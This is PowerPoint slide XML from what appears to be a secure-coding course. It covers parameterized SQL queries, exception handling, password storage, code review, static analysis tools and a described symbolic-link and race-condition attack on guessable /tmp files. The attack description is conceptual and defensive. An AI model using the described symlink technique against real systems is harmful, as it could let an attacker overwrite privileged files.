            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function (evaluates a string as code) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterized SQL queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to avoid SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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pl-PL" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ”select count(*) from users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0">
                <a:latin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</a:rPr>
              <a:t>	where name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL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pg_query_params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($connection, $query, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  			            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>array($login, $password));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4263231" y="5590951"/>
            <a:ext cx="428625" cy="0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6446713" y="5590157"/>
            <a:ext cx="428625" cy="1587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Deal with errors and exceptions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="220164" name="Picture 4" descr="erro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68" y="1907381"/>
            <a:ext cx="631190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5" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1645493" y="2947194"/>
            <a:ext cx="6119812" cy="1584325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Oval 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1645493" y="4388644"/>
            <a:ext cx="6119812" cy="935037"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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 animBg="1"/>
      <p:bldP spid="220165" grpId="1" animBg="1"/>
      <p:bldP spid="220166" grpId="0" animBg="1"/>
      <p:bldP spid="220166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Errors / exceptions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125538"/>
            <a:ext cx="3643312" cy="5183187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C00000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>No:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"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90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// a lot of commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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...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smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (Exception e) {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   e.printStackTrace();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57625" y="1116013"/>
            <a:ext cx="5357813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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Yes: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endParaRPr lang="en-US" sz="2000" b="1" kern="0" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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few commands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MalformedURLException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something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FileNotFoundException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XMLException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yet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and yet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213643" y="3644107"/>
            <a:ext cx="50022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Protect passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> and secret information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>don’t hard-code it: hard to change, easy to disclose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use external files instead (possibly encrypted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>or certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>or simply ask user for the password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16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Computer security – what is it?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/>
              <a:t>Software security – what can we do?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Web security – how bad is it?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52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Temporary file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>– or is it?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79884" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="839788" y="4135438"/>
            <a:ext cx="7810500" cy="200501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 defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79885" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1794501" y="5310790"/>
            <a:ext cx="2519981" cy="41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 dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mytmpfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79886" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5886949" y="5310790"/>
            <a:ext cx="1679027" cy="41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 dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/bash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79887" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1788741" y="4204576"/>
            <a:ext cx="3026857" cy="41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 dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myscript.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79877" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="839788" y="2060575"/>
            <a:ext cx="7810500" cy="1728788"/>
            <a:chOff x="583" y="1085"/>
            <a:chExt cx="5424" cy="1200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79879" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="583" y="1085"/>
              <a:ext cx="5424" cy="12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endParaRPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79880" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1246" y="1902"/>
              <a:ext cx="175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/tmp/mytmpfile</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79881" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1242" y="1133"/>
              <a:ext cx="210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/root/myscript.sh</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="79882" name="AutoShape 16"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79881" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2277" y="1421"/>
              <a:ext cx="1" cy="48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883" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311" y="1556"/>
              <a:ext cx="807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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>writes data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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06081" y="5160764"/>
            <a:ext cx="141605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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>symbolic link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 13" descr="pira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293" y="4149080"/>
            <a:ext cx="8858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AutoShape 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4283968" y="5517232"/>
            <a:ext cx="15732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0"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3245594" y="4581128"/>
            <a:ext cx="2622550" cy="936625"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 606"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:miter lim="800000"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6602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4" grpId="0" animBg="1"/>
      <p:bldP spid="79885" grpId="0"/>
      <p:bldP spid="79886" grpId="0"/>
      <p:bldP spid="79887" grpId="0"/>
      <p:bldP spid="2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Temporary file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>– or is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>symbolic link attack: someone guesses the name of your temporary file, and creates a link from it to another file </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(i.e. /bin/bash) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a problem of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>race condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>hostile environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>good temporary file has unique name that is hard to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…and is accessible only to the application using it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmpfile()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (C/C++), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mktemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> shell command or similar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use directories not writable to everyone</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(i.e. /tmp/my_dir with 0700 file permissions, or ~/tmp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>if you run as root, don’t use /tmp at all!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9801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implementation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CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC33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Review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>your code, let others review it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Making code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open-source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> doesn’t mean that experts will review it seriously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dirty="0" smtClean="0"/>
              <a:t>Tools that analyse source code, and look for potential:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>security holes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>functionality bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(including those not security related)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Recommendations for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C/C++, Java, Python, Perl, PHP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available at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://cern.ch/security/recommendations/en/code_tools.shtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>RPMs provided, some available on LXPLUS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>trivial to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>There is no magic:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>even the best tool will miss most non-trivial errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>they will just report the findings, but won’t fix the bugs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/>
              <a:t>Still, using code analysis tools is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>highly recommended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21118033">
            <a:off x="5330825" y="3746500"/>
            <a:ext cx="3568700" cy="809625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000" b="1" dirty="0"/>
              <a:t>These tools will help you develop better code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7680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Source code static analysis tools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77827" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Projects\code tools\screenshots\Findbugs-example-detai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831850"/>
            <a:ext cx="7356475" cy="595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Code tools: FindBugs / Java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2514" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Projects\code tools\screenshots\pycheck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688" y="1984375"/>
            <a:ext cx="8467725" cy="38576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885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Code tools: pychecker / Python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3" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\epic-fail-life-preserver-f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550" y="1125538"/>
            <a:ext cx="7710488" cy="5156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457052">
            <a:off x="428625" y="4710113"/>
            <a:ext cx="3678238" cy="129381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tools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are disabled,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or impossible to use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8090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0" y="2717800"/>
            <a:ext cx="5689600" cy="19256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Mark G. Graff, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kenneth R. van Wyk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Secure Coding: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Principles and Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83972" name="Picture 4" descr="cover-w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85875"/>
            <a:ext cx="17668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3" name="Picture 5" descr="cover-scp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357438"/>
            <a:ext cx="169545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1785938" y="1355725"/>
            <a:ext cx="5183187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en-US" sz="2600"/>
              <a:t>	Michael Howard, David LeBlanc </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1"/>
              <a:t>Writing Secure Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83975" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5321300"/>
            <a:ext cx="67548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 algn="r">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>Michael Howard, David LeBlanc, John Viega</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" algn="r">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1"/>
              <a:t>24 Deadly Sins of Software Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83976" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Training\Developing secure software\2011.05 - CERN course\400000000000000178781_s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3840163"/>
            <a:ext cx="178593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Security – in each phase of software development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>not added after implementation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Build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defense-in-depth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Follow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="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rgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is your worst enemy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>so validate all user input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16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Computer security – what is it?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Software security – what can we do?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Web security – how bad is it?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(computer) security?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i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Security is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enforcing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> a policy that describes rules for accessing resources*</a:t>
